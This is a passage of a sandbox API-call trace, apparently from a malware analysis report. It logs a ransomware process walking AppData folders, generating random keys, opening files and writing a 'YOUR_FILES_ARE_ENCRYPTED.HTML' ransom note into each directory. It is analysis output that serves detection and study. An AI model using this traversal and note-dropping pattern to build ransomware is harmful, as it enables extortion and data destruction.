returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApi" [0118.745] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApi", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApi\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApi\\*" [0118.745] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApi\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x75bd797b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x75bfdd8d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x75bfdd8d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630576, dwReserved1=0x630488, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0118.745] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x75bd797b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x75bfdd8d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x75bfdd8d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630576, dwReserved1=0x630488, cFileName="..", cAlternateFileName="")) returned 1 [0118.745] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x75bfdd8d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x75bfdd8d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x75bfdd8d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630576, dwReserved1=0x630488, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0118.745] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.745] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApi\\container.dat") returned 154 [0118.745] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0118.745] lstrlenW (lpString=".dat") returned 4 [0118.745] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0118.745] SystemFunction036 (in: RandomBuffer=0x19db44, RandomBufferLength=0x20 | out: RandomBuffer=0x19db44) returned 1 [0118.745] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApi\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\ac\\inethistory\\backgroundtransferapi\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x214 [0118.746] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x19db68 | out: lpFileSize=0x19db68*=0) returned 1 [0118.746] CloseHandle (hObject=0x214) returned 1 [0118.746] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x75bfdd8d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x75bfdd8d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x75bfdd8d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630576, dwReserved1=0x630488, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 0 [0118.746] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0118.746] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApi\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 170 [0118.746] GetProcessHeap () returned 0x600000 [0118.746] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.747] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApi\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\ac\\inethistory\\backgroundtransferapi\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0118.747] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0118.748] CloseHandle (hObject=0x320) returned 1 [0118.748] GetProcessHeap () returned 0x600000 [0118.748] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.748] GetProcessHeap () returned 0x600000 [0118.748] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102fc8 | out: hHeap=0x600000) returned 1 [0118.749] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x75bfdd8d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x75bfdd8d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x75bfdd8d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName="BackgroundTransferApiGroup", cAlternateFileName="BACKGR~2")) returned 1 [0118.749] StrStrIW (lpFirst="BackgroundTransferApiGroup", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.749] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApiGroup") returned 145 [0118.749] GetProcessHeap () returned 0x600000 [0118.749] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102fc8 [0118.750] lstrcpyW (in: lpString1=0x3102fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApiGroup" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApiGroup") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApiGroup" [0118.750] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApiGroup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApiGroup\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApiGroup\\*" [0118.750] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApiGroup\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x75bfdd8d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x75bfdd8d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x75bfdd8d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630576, dwReserved1=0x630488, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0118.750] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x75bfdd8d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x75bfdd8d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x75bfdd8d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630576, dwReserved1=0x630488, cFileName="..", cAlternateFileName="")) returned 1 [0118.750] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x75bfdd8d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x75bfdd8d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x75bfdd8d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630576, dwReserved1=0x630488, cFileName="..", cAlternateFileName="")) returned 0 [0118.750] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0118.751] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApiGroup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 175 [0118.751] GetProcessHeap () returned 0x600000 [0118.751] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.751] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApiGroup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\ac\\inethistory\\backgroundtransferapigroup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0118.752] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0118.752] CloseHandle (hObject=0x320) returned 1 [0118.753] GetProcessHeap () returned 0x600000 [0118.753] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.753] GetProcessHeap () returned 0x600000 [0118.753] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102fc8 | out: hHeap=0x600000) returned 1 [0118.753] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x75bfdd8d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x75bfdd8d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x75bfdd8d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName="BackgroundTransferApiGroup", cAlternateFileName="BACKGR~2")) returned 0 [0118.753] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0118.753] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 148 [0118.753] GetProcessHeap () returned 0x600000 [0118.753] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0118.756] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.758] CloseHandle (hObject=0x32c) returned 1 [0118.758] GetProcessHeap () returned 0x600000 [0118.758] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.758] GetProcessHeap () returned 0x600000 [0118.758] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0118.759] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7396bab9, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x7396bab9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x7396bab9, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0118.759] StrStrIW (lpFirst="Microsoft", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.759] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\Microsoft") returned 116 [0118.759] GetProcessHeap () returned 0x600000 [0118.759] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0118.760] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\Microsoft" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\Microsoft") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\Microsoft" [0118.761] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\Microsoft\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\Microsoft\\*" [0118.761] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\Microsoft\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7396bab9, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x7396bab9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x7396bab9, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0118.761] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7396bab9, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x7396bab9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x7396bab9, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName="..", cAlternateFileName="")) returned 1 [0118.761] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7396bab9, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x7396bab9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x7396bab9, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName="Windows", cAlternateFileName="")) returned 1 [0118.761] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7396bab9, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x7396bab9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x7396bab9, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName="Windows", cAlternateFileName="")) returned 0 [0118.761] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0118.761] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0118.761] GetProcessHeap () returned 0x600000 [0118.761] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\ac\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0118.762] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.763] CloseHandle (hObject=0x32c) returned 1 [0118.763] GetProcessHeap () returned 0x600000 [0118.763] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.763] GetProcessHeap () returned 0x600000 [0118.763] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0118.764] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7f62ab, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7f62ab, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7f62ab, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="Temp", cAlternateFileName="")) returned 1 [0118.764] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.764] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\Temp") returned 111 [0118.764] GetProcessHeap () returned 0x600000 [0118.764] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0118.765] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\Temp" [0118.765] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\Temp\\*" [0118.765] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7f62ab, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7f62ab, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7f62ab, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0118.765] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7f62ab, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7f62ab, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7f62ab, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName="..", cAlternateFileName="")) returned 1 [0118.765] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7f62ab, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7f62ab, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7f62ab, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName="..", cAlternateFileName="")) returned 0 [0118.765] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0118.765] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0118.765] GetProcessHeap () returned 0x600000 [0118.765] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0118.766] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.767] CloseHandle (hObject=0x32c) returned 1 